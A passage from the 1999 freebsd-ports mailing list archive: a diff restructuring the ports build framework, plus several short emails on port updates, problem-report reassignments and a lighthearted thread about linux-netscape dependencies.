'(XFree86-3\.3\.5|Motif-2\.1\.10)' - -.if ${OSVERSION} >= 300000 -PERL_VERSION= 5.00503 -.else -PERL_VERSION= 5.00502 -.endif -PERL_VER= 5.005 -PERL_ARCH= ${ARCH}-freebsd -PLIST_SUB+= PERL_VERSION=${PERL_VERSION} \ - PERL_VER=${PERL_VER} \ - PERL_ARCH=${PERL_ARCH} - -.if exists(/usr/bin/perl5) && ${OSVERSION} >= 300000 -# 3.0-current after perl5 import -.if !exists(/usr/bin/perl${PERL_VERSION}) && defined(USE_PERL5) -.BEGIN: - @${ECHO_MSG} "Error: you don't have the right version of perl in /usr/bin." - @${FALSE} -.endif -PERL5= /usr/bin/perl${PERL_VERSION} -PERL= /usr/bin/perl -.else -PERL5= ${LOCALBASE}/bin/perl${PERL_VERSION} -PERL= ${LOCALBASE}/bin/perl -.if defined(USE_PERL5) -BUILD_DEPENDS+= perl${PERL_VERSION}:${PORTSDIR}/lang/perl5 -RUN_DEPENDS+= perl${PERL_VERSION}:${PORTSDIR}/lang/perl5 -.endif -.endif - -# Don't try to build XFree86 even if ALWAYS_BUILD_DEPENDS is defined -- -# it's just too big.... -.if defined(USE_XLIB) && !defined(ALWAYS_BUILD_DEPENDS) -LIB_DEPENDS+= X11.6:${PORTSDIR}/x11/XFree86 -.endif +PORTUSEMK= yes +.include "bsd.port.use.mk" +.undef PORTUSEMK .if exists(${PORTSDIR}/../Makefile.inc) .include "${PORTSDIR}/../Makefile.inc" @@ -1631,7 +1568,7 @@ fi) .endif .if defined(USE_IMAKE) - @(cd ${WRKSRC} && ${XMKMF}) + @(cd ${WRKSRC} && ${MAKE_ENV} ${XMKMF}) .endif .endif @@ -1947,6 +1884,7 @@ @(if ${LIBTOOL} --version | grep -vq "1\.3\.3-freebsd-ports"; then \ (echo "Your libtool installation is out of date. Please remove"; \ echo "and reinstall ${PORTSDIR}/devel/libtool."; \ + ${MAKE} NOCLEANDEPENDS=yes clean; \ exit 1); \ fi; \ LIBTOOLDIR=`which ${LIBTOOL} | sed -e 's^/bin/libtool^/share/libtool^'` || ${LOCALBASE}/share/libtool; \ @@ -2357,24 +2295,32 @@ .endif +# Clean dependency lists: build and runtime. Print out directory names. + +clean-depends-list: + @${CLEAN-DEPENDS-LIST} + +CLEAN-DEPENDS-LIST= \ + checked="${PARENT_CHECKED}"; \ + for dir in $$(${ECHO} "${FETCH_DEPENDS} ${BUILD_DEPENDS} ${LIB_DEPENDS} ${RUN_DEPENDS}" | ${TR} '\040' '\012' | ${SED} -e 's/^[^:]*://' -e 's/:.*//') $$(${ECHO} ${DEPENDS} | ${TR} '\040' '\012' | ${SED} -e 's/:.*//'); do \ + if [ -d $$dir ]; then \ + if (${ECHO} $$checked | ${GREP} -qwv "$$dir"); then \ + child=$$(cd $$dir; ${MAKE} PARENT_CHECKED="$$checked" clean-depends-list); \ + for d in $$child; do ${ECHO} $$d; done; \ + ${ECHO} $$dir; \ + checked="$$dir $$child $$checked"; \ + fi; \ + else \ + ${ECHO_MSG} "${PKGNAME}: \"$$dir\" non-existent -- dependency list incomplete" >&2; \ + fi; \ + done | sort -u + .if !target(clean-depends) clean-depends: -.if defined(FETCH_DEPENDS) || defined(BUILD_DEPENDS) || defined(LIB_DEPENDS) \ - || defined(RUN_DEPENDS) - @for dir in `${ECHO} "${FETCH_DEPENDS} ${BUILD_DEPENDS} ${LIB_DEPENDS} ${RUN_DEPENDS}" | ${TR} '\040' '\012' | ${SED} -e 's/^[^:]*://' -e 's/:.*//' | sort -u`; do \ - if [ -d $$dir ] ; then \ - (cd $$dir; ${MAKE} NOCLEANDEPENDS=yes clean clean-depends); \ - fi \ + @for dir in `${CLEAN-DEPENDS-LIST}`; do \ + (cd $$dir; ${MAKE} NOCLEANDEPENDS=yes clean); \ done .endif -.if defined(DEPENDS) - @for dir in `${ECHO} "${DEPENDS}" | ${TR} '\040' '\012' | ${SED} -e 's/:.*//' | sort -u`; do \ - if [ -d $$dir ] ; then \ - (cd $$dir; ${MAKE} NOCLEANDEPENDS=yes clean clean-depends); \ - fi \ - done -.endif -.endif # Dependency lists: build and runtime. Print out directory names. @@ -2402,14 +2348,29 @@ fi; \ done | sort -u -# This one does not print out directory names -- it could take a long time. -package-depends: - @for dir in `${ECHO} "${LIB_DEPENDS} ${RUN_DEPENDS}" | ${TR} '\040' '\012' | ${SED} -e 's/^[^:]*://' -e 's/:.*//' | sort -u` `${ECHO} ${DEPENDS} | ${TR} '\040' '\012' | ${SED} -e 's/:.*//' | sort -u`; do \ +# Clean dependency lists: build and runtime. Print out directory names. + +package-depends-list: + @${PACKAGE-DEPENDS-LIST} + +PACKAGE-DEPENDS-LIST= \ + checked="${PARENT_CHECKED}"; \ + for dir in $$(${ECHO} "${LIB_DEPENDS} ${RUN_DEPENDS}" | ${TR} '\040' '\012' | ${SED} -e 's/^[^:]*://' -e 's/:.*//') $$(${ECHO} ${DEPENDS} | ${TR} '\040' '\012' | ${SED} -e 's/:.*//'); do \ if [ -d $$dir ]; then \ - (cd $$dir ; ${MAKE} package-name package-depends); \ + if (${ECHO} $$checked | ${GREP} -qwv "$$dir"); then \ + child=$$(cd $$dir; ${MAKE} PARENT_CHECKED="$$checked" package-depends-list); \ + for d in $$child; do ${ECHO} $$d; done; \ + ${ECHO} $$dir; \ + checked="$$dir $$child $$checked"; \ + fi; \ else \ ${ECHO_MSG} "${PKGNAME}: \"$$dir\" non-existent -- dependency list incomplete" >&2; \ fi; \ + done | sort -u + +package-depends: + @for dir in `${PACKAGE-DEPENDS-LIST}`; do \ + (cd $$dir; ${MAKE} package-name); \ done ################################################################ diff -urN -x CVS /usr/ports.ref/Mk/bsd.port.use.mk Mk/bsd.port.use.mk --- /usr/ports.ref/Mk/bsd.port.use.mk Wed Dec 31 16:00:00 1969 +++ Mk/bsd.port.use.mk Sun Dec 19 23:29:09 1999 @@ -0,0 +1,307 @@ +#-*- mode: Fundamental; tab-width: 4; -*- +# ex:ts=4 +# +# $FreeBSD: $ +# $NetBSD: $ +# +# Please view me with 4 column tabs! + +.if defined(PORTOPTIONMK) +# This section keeps tests for optional software. To use these, include this +# file where you would normally include , and after that +# file if you need to use it. This works with three sets of variables, +# WITH_, HAVE_ and USE_. WITH_ variables are used to determine if a package +# is wanted, HAVE_ variables determine what is or will be installed. +# A port should never set any WITH_ variables in it's Makefile. This file +# does not set any USE_ variables, these must be set explictly +# based on the results of this file. Other than the setting of HAVE_ +# variables the only side effect of this file is to define a some message +# targets which inform the user that the port has optional dependancies. +# These targets must also be called explictly from the port's Makefile. + +# The following defines are for the various levels of libraries in the +# GLib/GTK+/GNOME group of software. There are the following options: +# +# WITH_GLIB, WITH_GTK, WITH_IMLIB, WITH_GNOME: +# yes - Only set by the user, indicates that they always want +# this setting. +# no - Only set by the user, indicates that they never want +# this setting. +# +# The following variables might be set: +# +# HAVE_GLIB, HAVE_GTK: +# no - WITH_GLIB/WITH_GTK set to no. +# 10 - found GTK+ 1.0.x. +# 12 - found GLib/GTK+ 1.2.x or WITH_GLIB/WITH_GTK set to yes. +# HAVE_IMLIB: +# no - WITH_IMLIB set to no. +# yes - either found imlib or WITH_IMLIB set to yes. +# HAVE_GNOME: +# no - WITH_GNOME set to no. +# libs - found gnome-libs. +# core - found gnome-core or WITH_GNOME set to yes. +# control - found gnome-controlcenter. + +.if defined(WITH_GLIB) +.if ${WITH_GLIB} == "yes" +HAVE_GLIB= 12 +.else +HAVE_GLIB= no +.endif +.else +TEST_LIB:= `${LDCONFIG} -r | ${GREP} -qF -e "-lglib12"` +.if !empty(TEST_LIB) +HAVE_GLIB= 12 +.endif +.endif +.if !target(msg-option-glib) +msg-option-glib: +.if !defined(HAVE_GLIB) && !defined(QUIET_OPTIONS) + @${ECHO_MSG} "" + @${ECHO_MSG} "If you want to compile with GLib support," + @${ECHO_MSG} "hit Ctrl-C right now and use \"make WITH_GLIB=yes\"" + @${ECHO_MSG} "" +.endif +.endif + +.if defined(WITH_GTK) +.if ${WITH_GTK} == "yes" +HAVE_GTK= 12 +.else +HAVE_GTK= no +.endif +.else +TEST_LIB12:= `${LDCONFIG} -r | ${GREP} -qF -e "-lgtk12"` +TEST_LIB10:= `${LDCONFIG} -r | ${GREP} -qF -e "-lgtk10"` +.if !empty(TEST_LIB12) +HAVE_GTK= 12 +.elif !empty(TEST_LIB10) +HAVE_GTK= 10 +.endif +.endif +.if !target(msg-option-gtk) +msg-option-gtk: msg-option-glib +.if !defined(HAVE_GTK) && !defined(QUIET_OPTIONS) + @${ECHO_MSG} "" + @${ECHO_MSG} "If you want to compile with GTK+ support," + @${ECHO_MSG} "hit Ctrl-C right now and use \"make WITH_GTK=yes\"" + @${ECHO_MSG} "" +.endif +.endif + +.if defined(WITH_IMLIB) +.if ${WITH_IMLIB} == "yes" +HAVE_IMLIB= yes +.else +HAVE_IMLIB= no +.endif +.else +TEST_LIB:= `${LDCONFIG} -r | ${GREP} -qF -e "-lImlib"` +.if !empty(TEST_LIB) +HAVE_IMLIB= yes +.endif +.endif +.if !target(msg-option-imlib) +msg-option-imlib: msg-option-gtk +.if !defined(HAVE_IMLIB) && !defined(QUIET_OPTIONS) + @${ECHO_MSG} "" + @${ECHO_MSG} "If you want to compile with Imlib support," + @${ECHO_MSG} "hit Ctrl-C right now and use \"make WITH_IMLIB=yes\"" + @${ECHO_MSG} "" +.endif +.endif + +.if defined(WITH_GNOME) +.if ${WITH_GNOME} == "yes" +HAVE_GNOME= core +.else +HAVE_GNOME= no +.endif +.else +TEST_CONTROL:= `${LDCONFIG} -r | ${GREP} -qF -e "-lcapplet"` +TEST_CORE:= `${LDCONFIG} -r | ${GREP} -qF -e "-lpanel_applet"` +TEST_LIBS:= `${LDCONFIG} -r | ${GREP} -qF -e "-lgnome"` +.if !empty(TEST_CONTROL) +HAVE_GNOME= control +.elif !empty(TEST_CORE) +HAVE_GNOME= core +.elif !empty(TEST_LIBS) +HAVE_GNOME= libs +.endif +.endif +.if !target(msg-option-gnome) +msg-option-gnome: msg-option-imlib +.if !defined(HAVE_GNOME) && !defined(QUIET_OPTIONS) + @${ECHO_MSG} "" + @${ECHO_MSG} "If you want to compile with GNOME support," + @${ECHO_MSG} "hit Ctrl-C right now and use \"make WITH_GNOME=yes\"" + @${ECHO_MSG} "" +.endif +.endif + +.endif +# End of optional part. + +.if defined(PORTUSEMK) +# This section includes the USE_* definitions for bsd.port.mk, to allow them to +# be updated outside of bsd.port.mk. Please see the descriptions in that +# file. + +.if defined(BSD_PORT_USE_MK) +.if defined(USE_QT) +LIB_DEPENDS+= qt.2:${PORTSDIR}/x11-toolkits/qt142 +.endif + +.if defined(USE_QT2) +LIB_DEPENDS+= qt2.2:${PORTSDIR}/x11-toolkits/qt20 +USE_NEWGCC= yes +.endif + +.if defined(USE_BZIP2) +BUILD_DEPENDS+= bzip2:${PORTSDIR}/archivers/bzip2 +.endif +.if defined(USE_ZIP) +BUILD_DEPENDS+= unzip:${PORTSDIR}/archivers/unzip +.endif +.if defined(USE_GMAKE) +BUILD_DEPENDS+= gmake:${PORTSDIR}/devel/gmake +.endif +.if defined(USE_AUTOCONF) +GNU_CONFIGURE= yes +BUILD_DEPENDS+= autoconf:${PORTSDIR}/devel/autoconf +.endif +.if defined(USE_LIBTOOL) +GNU_CONFIGURE= yes +BUILD_DEPENDS+= libtool:${PORTSDIR}/devel/libtool +.if defined(USE_AUTOCONF) +LIBTOOLFILES?= aclocal.m4 +.else +LIBTOOLFILES?= configure +.endif +LIBTOOLFLAGS?= --disable-ltlibs +.endif +.if defined(USE_NEWGCC) && ${OSVERSION} < 400004 +CC= gcc295 +CXX= g++295 +BUILD_DEPENDS+= gcc295:${PORTSDIR}/lang/egcs +MAKE_ENV+= CC=${CC} CXX=${CXX} +.endif + +.if defined(REQUIRES_MOTIF) +LIB_DEPENDS+= Xpm.4:${PORTSDIR}/graphics/xpm +.if defined(PARALLEL_PACKAGE_BUILD) +BUILD_DEPENDS+= ${X11BASE}/lib/libXm.a:${PORTSDIR}/x11-toolkits/Motif-dummy +.endif +.endif + +PKG_IGNORE_DEPENDS?= '(XFree86-3\.3\.5|Motif-2\.1\.10)' + +.if ${OSVERSION} >= 300000 +PERL_VERSION= 5.00503 +.else +PERL_VERSION= 5.00502 +.endif +PERL_VER= 5.005 +PERL_ARCH= ${ARCH}-freebsd +PLIST_SUB+= PERL_VERSION=${PERL_VERSION} \ + PERL_VER=${PERL_VER} \ + PERL_ARCH=${PERL_ARCH} + +.if exists(/usr/bin/perl5) && ${OSVERSION} >= 300000 +# 3.0-current after perl5 import +.if !exists(/usr/bin/perl${PERL_VERSION}) && defined(USE_PERL5) +.BEGIN: + @${ECHO_MSG} "Error: you don't have the right version of perl in /usr/bin." + @${FALSE} +.endif +PERL5= /usr/bin/perl${PERL_VERSION} +PERL= /usr/bin/perl +.else +PERL5= ${LOCALBASE}/bin/perl${PERL_VERSION} +PERL= ${LOCALBASE}/bin/perl +.if defined(USE_PERL5) +BUILD_DEPENDS+= perl${PERL_VERSION}:${PORTSDIR}/lang/perl5 +RUN_DEPENDS+= perl${PERL_VERSION}:${PORTSDIR}/lang/perl5 +.endif +.endif + +# Don't try to build XFree86 even if ALWAYS_BUILD_DEPENDS is defined -- +# it's just too big.... +.if defined(USE_XLIB) && !defined(ALWAYS_BUILD_DEPENDS) +LIB_DEPENDS+= X11.6:${PORTSDIR}/x11/XFree86 +.endif + +# do these here backwards to make things look pretty... +.if defined(USE_GNOME) +USE_IMLIB= yes +.endif +.if defined(USE_IMLIB) +USE_GTK= yes +.endif +.if defined(USE_GTK) +.if ${USE_GTK} == "yes" +USE_GTK= 12 +.endif +.if ${USE_GTK} == "12" +USE_GLIB= 12 +.endif +.endif +.if defined(USE_GLIB) +.if ${USE_GLIB} == "yes" +USE_GLIB= 12 +.endif +.endif + +.if defined(USE_GLIB) +.if ${USE_GLIB} == "12" +LIB_DEPENDS+= glib12.3:${PORTSDIR}/devel/glib12 +GLIB_CONFIG?= ${LOCALBASE}/bin/glib12-config +.else +.error "Error: Invaild USE_GLIB version." +.endif +CONFIGURE_ENV+= GLIB_CONFIG="${GLIB_CONFIG}" +MAKE_ENV+= GLIB_CONFIG="${GLIB_CONFIG}" +.endif + +.if defined(USE_GTK) +.if ${USE_GTK} == "12" +LIB_DEPENDS+= gtk12.2:${PORTSDIR}/x11-toolkits/gtk12 +GTK_CONFIG?= ${X11BASE}/bin/gtk12-config +.elif ${USE_GTK} == "10" +# GTK+ 1.0 did not have a seperate GLib. +LIB_DEPENDS+= gtk10.1:${PORTSDIR}/x11-toolkits/gtk10 +GTK_CONFIG?= ${X11BASE}/bin/gtk10-config +.else +.error "Error: Invaild USE_GTK version." +.endif +CONFIGURE_ENV+= GTK_CONFIG="${GTK_CONFIG}" +MAKE_ENV+= GTK_CONFIG="${GTK_CONFIG}" +.endif + +.if defined(USE_IMLIB) +LIB_DEPENDS+= Imlib.5:${PORTSDIR}/graphics/imlib +.endif + +.if defined(USE_GNOME) +CONFIGURE_ARGS+= --localstatedir=${PREFIX}/share/gnome \ + --datadir=${PREFIX}/share/gnome \ + --with-gnome=${PREFIX} +.if ${USE_GNOME} == "yes" +USE_GNOME= core +.endif +.if ${USE_GNOME} == "control" +LIB_DEPENDS+= capplet.1:${PORTSDIR}/sysutils/gnomecontrolcenter +USE_GNOME= core +.endif +.if ${USE_GNOME} == "core" +LIB_DEPENDS+= panel_applet.2:${PORTSDIR}/x11/gnomecore +USE_GNOME= libs +.endif +.if ${USE_GNOME} == "libs" +LIB_DEPENDS+= gnome.3:${PORTSDIR}/x11/gnomelibs +.endif +.endif + +.endif +# End of use part. --vkogqOf2sHV7VnPd-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Dec 20 3:50: 5 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 73FB614D23 for ; Mon, 20 Dec 1999 03:50:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id DAA44697; Mon, 20 Dec 1999 03:50:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Mon, 20 Dec 1999 03:50:03 -0800 (PST) Message-Id: <199912201150.DAA44697@freefall.freebsd.org> To: freebsd-ports@FreeBSD.org Cc: From: Matt Behrens Subject: Re: ports/15526: [NEW PORT] security/pgpgpg ... Reply-To: Matt Behrens Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR ports/15526; it has been noted by GNATS. From: Matt Behrens To: freebsd-gnats-submit@freebsd.org, matt@zigg.com Cc: Subject: Re: ports/15526: [NEW PORT] security/pgpgpg ... Date: Mon, 20 Dec 1999 06:47:19 -0500 (EST) It looks like pgpgpg was moved on the gnupg site. Change the second MASTER_SITE from ftp://ftp.gnupg.org/pub/gcrypt/ to ftp://ftp.gnupg.org/pub/gcrypt/pgpgpg/ Thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Dec 20 7: 6:13 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 474801530D; Mon, 20 Dec 1999 07:05:20 -0800 (PST) (envelope-from phantom@FreeBSD.org) Received: (from phantom@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id HAA19300; Mon, 20 Dec 1999 07:05:20 -0800 (PST) (envelope-from phantom@FreeBSD.org) Date: Mon, 20 Dec 1999 07:05:20 -0800 (PST) From: Message-Id: <199912201505.HAA19300@freefall.freebsd.org> To: phantom@FreeBSD.org, freebsd-sparc@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: sparc/15577: Amanda 2.3.0 runtar program allow any user to run tar as root Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Amanda 2.3.0 runtar program allow any user to run tar as root Responsible-Changed-From-To: freebsd-sparc->freebsd-ports Responsible-Changed-By: phantom Responsible-Changed-When: Mon Dec 20 07:04:02 PST 1999 Responsible-Changed-Why: Misfiled PR To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Dec 20 8: 6:47 1999 Delivered-To: freebsd-ports@freebsd.org Received: from jade.chc-chimes.com (jade.chc-chimes.com [216.28.46.6]) by hub.freebsd.org (Postfix) with ESMTP id 1F55A152EA for ; Mon, 20 Dec 1999 08:06:45 -0800 (PST) (envelope-from billf@chc-chimes.com) Received: by jade.chc-chimes.com (Postfix, from userid 1001) id 303751C59; Mon, 20 Dec 1999 11:06:16 -0500 (EST) Received: from localhost (localhost [127.0.0.1]) by jade.chc-chimes.com (Postfix) with ESMTP id 203B3381B; Mon, 20 Dec 1999 11:06:16 -0500 (EST) Date: Mon, 20 Dec 1999 11:06:16 -0500 (EST) From: Bill Fumerola To: ports@FreeBSD.org Cc: girgen@partitur.se Subject: linux-netscape Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The first person to give me the reason why we require compat22 a.out libs to install the (completly ELF) linux-communicator47 gets a cookie. Double cookies for the first person to send me a patch to fix this broken behavior. -- - bill fumerola - billf@chc-chimes.com - BF1560 - computer horizons corp - - ph:(800) 252-2421 - bfumerol@computerhorizons.com - billf@FreeBSD.org - To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Dec 20 8:20:59 1999 Delivered-To: freebsd-ports@freebsd.org Received: from bastuba.partitur.se (bastuba.partitur.se [193.219.246.194]) by hub.freebsd.org (Postfix) with ESMTP id A600815293 for ; Mon, 20 Dec 1999 08:20:52 -0800 (PST) (envelope-from girgen@partitur.se) Received: from elbas.partitur.se (elbas.partitur.se [193.219.246.222]) by bastuba.partitur.se (8.8.8/8.8.8) with ESMTP id RAA24991; Mon, 20 Dec 1999 17:20:49 +0100 (CET) (envelope-from girgen@partitur.se) Received: from partitur.se (localhost [127.0.0.1]) by elbas.partitur.se (8.9.3/8.9.3) with ESMTP id RAA29291; Mon, 20 Dec 1999 17:20:49 +0100 (CET) (envelope-from girgen@partitur.se) Message-ID: <385E5761.4B126185@partitur.se> Date: Mon, 20 Dec 1999 17:20:49 +0100 From: Palle Girgensohn Organization: Partitur X-Mailer: Mozilla 4.7 [en] (X11; I; FreeBSD 3.3-RELEASE i386) X-Accept-Language: sv, en MIME-Version: 1.0 To: Bill Fumerola Cc: ports@FreeBSD.org Subject: Re: linux-netscape References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Bill Fumerola wrote: > > The first person to give me the reason why we require compat22 a.out libs > to install the (completly ELF) linux-communicator47 gets a cookie. We don't. No cookies. > Double cookies for the first person to send me a patch to fix this > broken behavior. The patch is in PR-15287 since Dec 5. How can I receive my cookies? :-) /Palle To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Dec 20 8:28:31 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id CE90B152CE; Mon, 20 Dec 1999 08:28:14 -0800 (PST) (envelope-from billf@FreeBSD.org) Received: (from billf@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id IAA29956; Mon, 20 Dec 1999 08:28:14 -0800 (PST) (envelope-from billf@FreeBSD.org) Date: Mon, 20 Dec 1999 08:28:14 -0800 (PST) From: Message-Id: <199912201628.IAA29956@freefall.freebsd.org> To: billf@FreeBSD.org, freebsd-ports@FreeBSD.org, billf@FreeBSD.org Subject: Re: ports/15287: Fix for linux-netscape not requiring X aout libs Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Fix for linux-netscape not requiring X aout libs Responsible-Changed-From-To: freebsd-ports->billf Responsible-Changed-By: billf Responsible-Changed-When: Mon Dec 20 08:27:55 PST 1999 Responsible-Changed-Why: I bitched about this on the mailing lists, I can review the patch. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Dec 20 8:29: 7 1999 Delivered-To: freebsd-ports@freebsd.org Received: from jade.chc-chimes.com (jade.chc-chimes.com [216.28.46.6]) by hub.freebsd.org (Postfix) with ESMTP id 7B2A515293 for ; Mon, 20 Dec 1999 08:29:06 -0800 (PST) (envelope-from billf@chc-chimes.com) Received: by jade.chc-chimes.com (Postfix, from userid 1001) id 9D3C61C59; Mon, 20 Dec 1999 11:28:37 -0500 (EST) Received: from localhost (localhost [127.0.0.1]) by jade.chc-chimes.com (Postfix) with ESMTP id 99FF9381B; Mon, 20 Dec 1999 11:28:37 -0500 (EST) Date: Mon, 20 Dec 1999 11:28:37 -0500 (EST) From: Bill Fumerola To: Palle Girgensohn Cc: ports@FreeBSD.org Subject: Re: linux-netscape In-Reply-To: <385E5761.4B126185@partitur.se> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 20 Dec 1999, Palle Girgensohn wrote: > > The first person to give me the reason why we require compat22 a.out libs > > to install the (completly ELF) linux-communicator47 gets a cookie. > > We don't. No cookies. I thought so. > > Double cookies for the first person to send me a patch to fix this > > broken behavior. > > The patch is in PR-15287 since Dec 5. How can I receive my cookies? :-) You'll recieve your cookies in the form of a commit mail once the ports freeze thaws. -- - bill fumerola - billf@chc-chimes.com - BF1560 - computer horizons corp - - ph:(800) 252-2421 - bfumerol@computerhorizons.com - billf@FreeBSD.org - To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Dec 20 8:39: 6 1999 Delivered-To: freebsd-ports@freebsd.org Received: from cichlids.com (as8-pri49.rp-plus.de [149.221.239.177]) by hub.freebsd.org (Postfix) with ESMTP id 46D0415347 for ; Mon, 20 Dec 1999 08:39:04 -0800 (PST) (envelope-from alex@cichlids.com) Received: from cichlids.cichlids.com (cichlids.cichlids.com [192.168.0.10]) by cichlids.com (Postfix) with ESMTP id C506AAB7F; Mon, 20 Dec 1999 17:39:02 +0100 (CET) Received: (from alex@localhost) by cichlids.cichlids.com (8.9.3/8.9.3) id RAA02867; Mon, 20 Dec 1999 17:39:50 +0100 (CET) (envelope-from alex) Date: Mon, 20 Dec 1999 17:39:50 +0100 From: Alexander Langer To: Bill Fumerola Cc: Palle Girgensohn , ports@FreeBSD.ORG Subject: Re: linux-netscape Message-ID: <19991220173950.A2733@cichlids.cichlids.com> Mail-Followup-To: Bill Fumerola , Palle Girgensohn , ports@FreeBSD.ORG References: <385E5761.4B126185@partitur.se> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: ; from billf@chc-chimes.com on Mon, Dec 20, 1999 at 11:28:37AM -0500 X-PGP-Fingerprint: 44 28 CA 4C 46 5B D3 A8 A8 E3 BA F3 4E 60 7D 7F X-Verwirrung: Dieser Header dient der allgemeinen Verwirrung. Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Thus spake Bill Fumerola (billf@chc-chimes.com): > > The patch is in PR-15287 since Dec 5. How can I receive my cookies? :-) > You'll recieve your cookies in the form of a commit mail once the > ports freeze thaws. write(Palle, (cookie) cvs commit, 1); ? That's a cheat, Bill! Alex -- I doubt, therefore I might be. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Dec 20 9: 0: 7 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 06CF1152F6 for ; Mon, 20 Dec 1999 09:00:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id JAA33626; Mon, 20 Dec 1999 09:00:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 8AC3E15310; Mon, 20 Dec 1999 08:59:07 -0800 (PST) Message-Id: <19991220165907.8AC3E15310@hub.freebsd.org> Date: Mon, 20 Dec 1999 08:59:07 -0800 (PST) From: tkato@prontomail.ne.jp To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15583: Update port: lang/cim to 3.33 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15583 >Category: ports >Synopsis: Update port: lang/cim to 3.33 >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Mon Dec 20 09:00:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: KATO Tsuguru >Release: 3.3-RELEASE i386 >Organization: >Environment: >Description: * Updated version 3.29 to 3.33 Remove file: patches/patch-aa patches/patch-ab >How-To-Repeat: >Fix: diff -urN /usr/ports/lang/cim/Makefile lang/cim/Makefile --- /usr/ports/lang/cim/Makefile Wed Oct 27 19:16:01 1999 +++ lang/cim/Makefile Sun Dec 19 17:32:29 1999 @@ -1,18 +1,18 @@ # New ports collection makefile for: cim -# Version required: 3.29 +# Version required: 3.33 # Date created: 21 Sept 1996 # Whom: giffunip # # $FreeBSD: ports/lang/cim/Makefile,v 1.12 1999/10/27 08:14:39 mharo Exp $ # -DISTNAME= cim-3.29 +DISTNAME= cim-3.33 CATEGORIES= lang MASTER_SITES= ftp://ftp.ifi.uio.no/pub/cim/ MAINTAINER= ports@FreeBSD.org -GNU_CONFIGURE= yes +USE_LIBTOOL= yes MAN1= cim.1 .include diff -urN /usr/ports/lang/cim/files/md5 lang/cim/files/md5 --- /usr/ports/lang/cim/files/md5 Mon Mar 15 20:36:35 1999 +++ lang/cim/files/md5 Sun Dec 19 16:50:07 1999 @@ -1 +1 @@ -MD5 (cim-3.29.tar.gz) = 35ed715cd3b4892f01dc6884fbc5058a +MD5 (cim-3.33.tar.gz) = 9cad46e2b98388eaa5fc60a73a50ed59 diff -urN /usr/ports/lang/cim/patches/patch-aa lang/cim/patches/patch-aa --- /usr/ports/lang/cim/patches/patch-aa Mon Mar 15 20:36:35 1999 +++ lang/cim/patches/patch-aa Thu Jan 1 09:00:00 1970 @@ -1,28 +0,0 @@ ---- ltconfig.orig Sat Sep 12 09:59:28 1998 -+++ ltconfig Tue Mar 9 20:09:28 1999 -@@ -640,8 +640,8 @@ - ;; - - # FreeBSD 3, at last, uses gcc -shared to do shared libraries. -- freebsd3*) -- archive_cmds='$CC -shared -o $lib$libobjs$deplibs' -+ freebsd*) -+ archive_cmds='$LD -Bshareable -o $lib$libobjs$deplibs /usr/lib/c++rt0.o' - hardcode_direct=yes - hardcode_minusL=yes - hardcode_shlibpath_var=no -@@ -766,10 +766,11 @@ - soname_spec='$libname.so.$major' - ;; - --freebsd2* | freebsd3*) -- version_type=sunos -+freebsd*) -+ objformat=`test -x /usr/bin/objformat && /usr/bin/objformat || echo aout` -+ 